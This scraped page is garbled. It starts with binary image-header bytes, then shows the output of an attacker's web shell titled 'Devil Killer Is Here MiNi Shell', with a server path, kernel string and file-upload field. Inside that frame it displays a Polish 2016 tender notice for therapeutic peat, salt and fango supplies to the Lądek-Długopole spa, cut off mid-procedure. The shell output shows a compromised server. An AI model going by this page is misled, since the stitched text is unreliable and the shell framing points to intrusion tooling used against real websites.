JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161124/350623-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.uzdrowisko-ladek.pl' target='_blank'>www.uzdrowisko-ladek.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 350623 - 2016
              z dnia 2016-11-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Lądek-Zdrój: Sukcesywne dostawy borowiny leczniczej, plastrów i pasty borowinowej oraz soli leczniczej i masy fango parafinowej dla Uzdrowiska Lądek - Długopole S.A.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Uzdrowisko Lądek-Długopole S.A., krajowy numer identyfikacyjny
              000288283, ul.
              ul. Wolności 
              4,
              57-540  
              Lądek-Zdrój, woj.
              dolnośląskie, państwo
              Polska, tel.
              74 8115470, e-mail
              , faks
              74 8115470.
              <br />
              Adres strony internetowej (URL): www.uzdrowisko-ladek.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Podmiot Leczniczy- Spółka Akcyjna Województwa Dolnośląskiego</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.uzdrowisko-ladek.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.uzdrowisko-ladek.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca<br />
                Adres:
                <br />Uzdrowisko Lądek-Długopole S.A. ul. Wolności 4 57-540 Lądek Zdrój</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Sukcesywne dostawy borowiny leczniczej, plastrów i pasty borowinowej oraz soli leczniczej i masy fango parafinowej dla Uzdrowiska Lądek - Długopole S.A.<br /><b>Numer referencyjny: </b>ZP/23/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />Zamawiajacy nie zastrzega.<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />6<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia są: Sukcesywne dostawy borowiny leczniczej, plastrów i pasty borowinowej oraz soli leczniczej i masy fango parafinowej dla Uzdrowiska Lądek- Długopole S.A. w podziale na następujące części:
A. Część 1 - dostawy borowiny leczniczej dla Uzdrowiska Lądek- Długopole S.A.  w ilości 80 040kg zgodnie z formularzem cenowym  - zał. nr 1a do SIWZ. Borowina lecznicza musi być naturalnym surowcem leczniczym pochodzącym z terenów uzdrowiskowych zgodnie z pkt. G poniżej. Borowina pakowana w worki foliowe do 30kg. Dostawy do Lądka Zdroju maksymalnie 4 razy w roku. 
B. Część 2  dostawy leczniczych plastrów borowinowych małych w ilości 29 500 szt. dla  Uzdrowiska Lądek - Długopole S.A. - zgodnie z formularzem cenowym - zał. nr 1b do SIWZ. Plastry borowinowe małe o wymiarach (18x30) cm, dopuszczamy (+3/+3) cm. Sucha masa pokryta flizeliną. Ciężar plastrów minimalnie 410g, plastry jednorazowe w woreczkach PE, szczelnie zamknięte, pakowane w tekturowe pudełka. Plaster wilgotny, ale zwarty, a jego konstrukcja uniemożliwia ochlapanie pacjenta oraz okolicy zabiegu. Borowina lecznicza użyta do produkcji  plastrów  musi być naturalnym surowcem leczniczym pochodzącym z terenów uzdrowiskowych zgodnie z  pkt. G poniżej. 14 500 szt. dla Lądka Zdroju, 15 000 szt. dla Długopola Zdroju. Dostawy raz w miesiącu do Lądka Zdroju i do Długopola Zdroju.
C. Część 3  dostawy leczniczych plastrów borowinowych dużych  w ilości 8 000 szt. dla  Uzdrowiska Lądek - Długopole S.A. - zgodnie z formularzem cenowym - zał. nr 1c do SIWZ. Plastry borowinowe duże o wymiarach: (22x35) cm dopuszczamy: (+3/+3) cm. Sucha masa pokryta flizeliną. Ciężar plastrów  minimalnie 600g, plastry jednorazowe w woreczkach PE, szczelnie zamknięte, pakowane w tekturowe pudełka. Plaster wilgotny, ale zwarty, a jego konstrukcja uniemożliwia ochlapanie pacjenta oraz okolicy zabiegu. Borowina lecznicza użyta do produkcji  plastrów  musi być naturalnym surowcem leczniczym pochodzącym z terenów uzdrowiskowych zgodnie z  pkt. G poniżej. Dostawy raz w miesiącu do Długopola Zdroju.

D. Część 4  dostawy leczniczej pasty borowinowej w ilości 13 000 kg dla  Uzdrowiska Lądek-Długopole S.A. - zgodnie z formularzem cenowym - zał. nr 1d do SIWZ.  Drobno zmielona, pakowana w wiaderka od 10 kg do 20 kg. Borowina lecznicza użyta do produkcji pasty musi być naturalnym surowcem leczniczym pochodzącym z terenów uzdrowiskowych zgodnie z rozdz. IV  pkt. G. SIWZ.  Dostawy raz w miesiącu do Długopola Zdroju.

E. Część   5   -  dostawy leczniczej soli w ilości 2200 kg dla Uzdrowiska Lądek  Długopole S.A. zgodnie z formularzem cenowym zał. nr 1e do SIWZ,  będącej naturalnym surowcem leczniczym pochodzącym z terenów uzdrowiskowych. 1 kg preparatu zawiera: kationy: jony sodu nie mniej niż 36%, jony wapnia nie mniej niż 0,2%, jony magnezu nie mniej niż 0,1%, jony żelaza (II),(III) nie mniej niż 0,02%; aniony: jony chlorkowe nie mniej niż 55%.
 Informacje umieszczone na workach: nazwa, skład ilościowy, zawartość opakowania, data ważności, wskazania, przeciwwskazania, pozwolenie Ministerstwa Zdrowia, sposób stosowania, działanie, producent. Worki 10kg  2000 kg, worki 2kg - 200kg. Dostawy 3-4 razy w roku do Długopola Zdroju.

F. Część   6   -  dostawy masy fango parafinowej i folii do okładów fango dla Uzdrowiska Lądek  Długopole S.A. zgodnie z formularzem cenowym zał. nr 1f do SIWZ.
Masa fango parafinowa opakowanie 12 kg- 30 szt. i folia dł. rolki 1000m, szer. 65cm, gramatura 15 mikronów  10 szt. Dostawy 3-4 razy w roku do Lądka Zdroju.

G. Borowina lecznicza, o której mowa w częściach  od 1 do 4 musi być: 
naturalnym surowcem leczniczym pochodzącym z terenów uzdrowiskowych, którego właściwości lecznicze zostały potwierdzone w decyzjach Ministra Zdrowia, wydanych na podstawie ustawy z dnia 28 lipca 2005 r. o lecznictwie uzdrowiskowym, uzdrowiskach i obszarach ochrony uzdrowiskowej oraz o gminach uzdrowiskowych (Obwieszczenie Marszałka Sejmu Rzeczypospolitej Polskiej z dnia 3 czerwca 2016 r. w sprawie ogłoszenia jednolitego tekstu ustawy o lecznictwie uzdrowiskowym, uzdrowiskach i obszarach ochrony uzdrowiskowej oraz o gminach uzdrowiskowych Dz. U. z 2016 r. poz.  879); wydobywana zgodnie z ustawą z dnia 9 czerwca 2011r. Prawo geologiczne i górnicze (Dz. U. z 2015r., poz. 196), przebadana przez jednostkę wymienioną w: Obwieszczeniach Ministra Zdrowia w sprawie wykazu jednostek uprawnionych do potwierdzenia właściwości leczniczych naturalnych surowców leczniczych i właściwości leczniczych klimatu:
o	z dnia 17 lipca 2007r. (Dz. U. Ministra Zdrowia Nr 12, poz. 65),
o	z dnia 14 stycznia 2008r. (Dz. U. Ministra Zdrowia Nr 1, poz. 4),
o	z dnia 14 lipca 2009r. (Dz. U. Ministra Zdrowia Nr 6, poz. 35),
o	w zakresie określonym w Rozporządzeniu Ministra Zdrowia z dnia 13 kwietnia 2006r.  w sprawie zakresu badań niezbędnych do ustalenia właściwości leczniczych naturalnych surowców leczniczych i właściwości leczniczych klimatu, kryteriów ich oceny oraz wzoru świadectwa potwierdzającego te właściwości ( Dz. U. z 2006r. Nr 80, poz. 565). 
	jej właściwości lecznicze powinny być potwierdzone świadectwem wystawionym przez ww. jednostki zgodnie ze wzorem określonym w Rozporządzeniu Ministra Zdrowia z dnia 13 kwietnia 2006r. 
	borowina o następujących minimalnych właściwościach (minimalne wymagania ogólne i fizykochemiczne):
a. wilgotność: co najmniej 80%,
b. zdolność chłonięcia wody gH2O /1 gs.m.: co najmniej 13,
c. objętość sedymentacyjna ml/ 1gs.m.: co najmniej 25,
d. odczyn PH: od 5 do 6,7,
e. zawartość substancji organiczno-humusowych: co najmniej 92,5%.
H. Wymagania szczegółowe dla dostaw produktów, o których mowa w częściach 1-6 zamówienia wg zał. 1a-1f do SIWZ.
H.1.  Zamówienie polega na dostawach borowiny leczniczej, plastrów i pasty borowinowej oraz soli leczniczej i masy fango parafinowej (zwanych dalej produktami) dla Uzdrowiska Lądek-Długopole  S.A.
H.2.  Dostawy wykonywane będą według  zamówień częściowych  składanych telefonicznie lub faksem przez upoważnionego pracownika Zamawiającego, do obiektów Zamawiającego,  transportem Wykonawcy i na jego koszt:
- dla części 1,2,3,4:  do 8 dni od dnia złożenia zamówienia  (z  wyłączeniem dni  wolnych od pracy tj. sobót, niedziel i świąt ) w godzinach  od  7:00 do 14:00;
- dla części 5,6: w terminie określonym w ofercie (pozacenowe kryterium oceny ofert).
a) Cześć 1: dostawy 4 razy w roku do ZPL Wojciech,  Pl. Mariański 3 w Lądku Zdroju,
b) Część 2: dostawy raz w miesiącu do ZPL Karol, ul.  Zdrojowa 16 w  Długopolu Zdroju i do Szp. Uzdr. JUBILAT, ul. Wolności 4a w Lądku Zdroju,
c) Część 3 i 4: dostawy raz w miesiącu do ZPL Karol, ul.  Zdrojowa 16 w  Długopolu Zdroju,
d) Część 5: 3-4 razy w roku do ZPL Karol, ul.  Zdrojowa 16 w  Długopolu Zdroju,
e) Cześć 6: 3-4 razy w roku do Szp. Uzdr. JUBILAT, ul. Wolności 4a w Lądku Zdroju.
H.3.  Osobami upoważnionymi ze strony Zamawiającego do składania zamówień i odbioru  towaru  są:
	Kierownik Zakładu Przyrodoleczniczego KAROL w Długopolu Zdroju  Beata Brogowska  tel. 74/813-90-40 e-mail: karol.planowanie@uzdrowisko-ladek.pl, 
	Kierownik  ZPL Lądek Zdrój  - Katarzyna Urbańska  tel. 74/811 62 27 wew. 251, 
e-mail: katarzyna.urbanska@uzdrowisko-ladek.pl.
H.4.  Warunki płatności: Płatności będą dokonywane w terminie określonym w ofercie, na rachunek Wykonawcy na podstawie złożonej  faktury wystawionej przy każdej dostawie (wraz z dokumentem WZ podpisanym przez Kierownika ZPL lub osobę upoważnioną przez niego lub przez zarząd spółki).
Zakres zamówienia zawiera się w kwocie powyżej 30 tys. euro, a poniżej  progów  ustalonych na podstawie art. 11 ust.  8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. 2015r., poz. 2164 ze zm. zwanej dalej Pzp). <br /><br /><b>II.5) Główny kod CPV: </b>09112200-9<br /><b> Dodatkowe kody CPV:</b>33690000-3,
                33632000-9,
                33632100-0,
                14450000-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający za spełnienie warunku uzna przedłożenie oświadczenia o posiadaniu kompetencji i uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów wg zał. nr 2a do SIWZ.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający za spełnienie warunku uzna przedłożenie oświadczenia o znajdowaniu się w sytuacji ekonomicznej i finansowej pozwalającej na wykonanie zamówienia  wg zał. nr 2a do SIWZ.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                 Zamawiający za spełnienie warunku uzna złożenie oświadczenia, że Wykonawca posiada zdolności techniczne lub zawodowe pozwalające na wykonanie zamówienia wg zał. 2a do SIWZ.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 Pzp.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1.	Świadectwo potwierdzające właściwości lecznicze dotyczy części 1, 2, 3, 4 i 5 zamówienia,
2.	Pozwolenie (decyzja) na dopuszczenie do obrotu produktu leczniczego  dotyczy części 2, 3,4,5 i 6 zamówienia.

</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Inne dokumenty: 
1. Wypełniony i podpisany formularz ofertowy  wg  zał. nr 1,
2. Wypełniony i podpisane formularze cenowe 1a i/lub 1b i/lub 1c i/lub 1d i/lub 1e i/lub 1f,
3. Wypełnione i podpisane oświadczenie wg zał. nr 4 dla części 1,2,3 i 4,
4. Wypełnione i podpisane oświadczenie wg zał. nr 4a -  dla części 5,
5. Wypełnione i podpisane oświadczenie wg zał. nr 4b -  dla części 6,
6. Dokument lub pełnomocnictwo, z których wynika uprawnienie osoby (osób) do składania oświadczeń woli i reprezentowania Wykonawcy, jeżeli to prawo nie wynika z właściwego rejestru. 
7. OŚWIADCZENIE DOTYCZĄCE PRZYNALEŻNOŚCI DO TEJ SAMEJ GRUPY KAPITAŁOWEJ:
Zgodnie z art. 24 ust 11 Pzp Wykonawca w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 Pzp, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 Pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Wzór oświadczenia o przynależności do grupy kapitałowej stanowi zał. nr 2c do SIWZ.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
